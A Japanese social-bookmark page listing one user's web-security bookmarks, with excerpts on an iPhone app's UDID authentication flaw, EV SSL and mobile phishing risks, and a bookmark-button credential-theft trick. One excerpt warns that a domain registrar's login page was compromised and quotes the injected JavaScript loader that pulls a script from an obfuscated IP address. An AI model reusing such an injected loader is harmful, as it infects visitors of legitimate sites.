タグ

webとsecurityに関するjamgのブックマーク (7)

  • ケータイの流儀を常識と思いこむのは危険 | 水無月ばけらのえび日記

    公開: 2009年8月6日14時10分頃 「やはり退化していた日のWeb開発者「ニコニコ動画×iPhone OS」の場合 (takagi-hiromitsu.jp)」。 iPhone・iPod Touch用の「ニコニコ動画」アプリのサーバ側実装が脆弱だったというお話。iPhoneやiPod Touchの端末製造番号 (UDID) は秘密情報ではない上に詐称可能なのですが、そのUDIDに依存した認証を行っていたため、他人のUDIDが分かると、その人の非公開マイリストなどが見られてしまう……ということのようで。現在は修正されているようです。 脆弱性の話としては、認証方法の不備という単純な話なのですが、むしろ周辺の反応が興味深いですね。いちばん面白いと思ったのがこのブックマークコメント。 ツッコミがたくさん入っていますが、「流儀が違う」というのは、実は全くその通りなのですね。端末固有IDによる

    jamg
    jamg 2009/08/06
    "ケータイの流儀はケータイサイト以外には通用しない"
  • VALUE DOMAINにウイルスコードが仕込まれる! | 無題ブログ

    VALUE DOMAINにウイルスコードが仕込まれる! VALUE DOMAINのHPの一部のページにウイルスが仕込まれてるようです。 ウイルスコードが仕込まれているページは、VALUE DOMAINのログイン画面です。(まだ修正されてないのでリンクは切ってます) ttps://www.value-domain.com/login.php 上記にアクセスをしたらjavascriptが読み込まれるようです。 PLAIN TEXTJavaScript: <SCRIPT LANGUAGE="JAVASCRIPT"> var js = document.createElement("script"); js.src = "http://1856317799:888/s.js"; try {document.getElementsByTagName('head')[0].appendChild(js

  • 高木浩光@自宅の日記 - EV SSLを緑色だというだけで信用してはいけない実例

    ■ EV SSLを緑色だというだけで信用してはいけない実例 EV SSLに関して以前から懸念されていたことが既に現実になっていた。一時期、EV証明書を発行する一部のCA事業者が、EV SSLの宣伝で「緑色になったら安全」などといいかげんな広告を打っていて、誤った理解が広まりかねないと心配されていたわけだが、「緑色になったら安全」という理解がなぜ駄目なのか、その理由の一つは、いわゆる「共用SSL」サービスにEV SSLが使われかねないという懸念だった。 そして、その実例が既に存在していたことに気付いた。図1は私が作ったWebページである。 アドレスバーは緑色になっているが、ここに入力されたデータは私宛にメールで送信*1されてくる。(このページは既に閉鎖している。) 悪意ある者がこうしたページを作成*2し、何らかの方法でこのページに人々を誘導*3すれば、フィッシングの被害が出るおそれがある。

  • 高木浩光@自宅の日記 - ケータイWebはそろそろ危険

    ■ ケータイWebはそろそろ危険 これまでの背景と最近の状況変化 「安全なWebサイト利用の鉄則」にある通り、フィッシングに騙されずにWebを安全に使う基手順は、(パスワードやカード番号などの)重要な情報を入力する直前に今見ているページのアドレスを確認することなのだが、しばしば、「そのページにアクセスする前にジャンプ先URLを確認する」という手順を掲げる人がいる。しかし、それは次の理由で失当である。 ジャンプ先URLを確認する手段がない。ステータスバーは古来よりJavaScriptで自由に書き換えられる表示欄とされてきたのであり、ジャンプ先の確認に使えない。 ジャンプ先URLを事前に確認したとしても、それが(任意サイトへの)リダイレクタになっている場合、最終的にどこへアクセスすることになるか不明。 そもそも、アクセスする前から、アドレス確認の必要性を予見できるとは限らない。普通は、アクセ

  • ソーシャルブックマークユーザーのIDとPASSをいとも簡単に抜き取る手口*ホームページを作る人のネタ帳

    これはひっかかった・・・ 先日、WEBセキュリティの会社に勤める友人と会った。 私のブログを結構見ているという話から盛り上がり、最近ウィルスってどうなの?何に気をつけたらいい?と聞いてみたんです。 彼の話は面白い話でいっぱいだった。 例えばYouTubeの上のような画像。 この中心の再生ボタンを押すと、ウィルスのダウンロードが始まるプログラムも見せてもらったが、これはかなり引っかかる・・・。 もう一つ、私がひっかかりそうなものとして『Bボタンフィッシング』を教えてくれた。 Bボタンフィッシングとは何? 記事の最後には私のブログでもおなじみの、はてなブックマークへ追加ボタンや、バザールのブックマークボタン(Bボタン)を設置しているブログを最近良く見かける。 何気なく私はそれを利用したりしている。 ↑これのこと 彼がサンプルとして作ってくれた物を試してみた。 Bボタンをクリックすると次の画面が

    ソーシャルブックマークユーザーのIDとPASSをいとも簡単に抜き取る手口*ホームページを作る人のネタ帳
  • 【サイト持ちの方は必読】 例の訴訟メールに関して広く注意を促さないといけなくなった。|おはら汁(緊急避難場所)

    とりあえずこの記事を読んでください。 http://ameblo.jp/oharan/entry-10027413015.html 事の経緯を簡単に説明すると、今から約1年前に、世間を賑わせたある事件に関して記事を書きました。 で、その時に書いた記事というのは、自分用のメモといった感じの、調べた情報を羅列していただけといった内容でした。 別に特定個人がどことどう繋がってるとか、誰がどこからいくら金をもらったとか、そういう断定口調の文章は一切書かず、さらにその記事を読んだ人間の多くが 「そう思ってしまう」 ような書き方もしておりません。 それと当時 『その事件に関与してると言われていた人物』 が代表を務めるある会社の登記がネット上に落ちていたので、それも併せて掲載しました。(が、これに関してもだからどうという事は一切書かず) 逆に 「当の人はブログで繋がりを否定している」 という情報を載せ

  • http://cgi36.plala.or.jp/tera5/v/security/webap_sec2/chap01.html

  • 1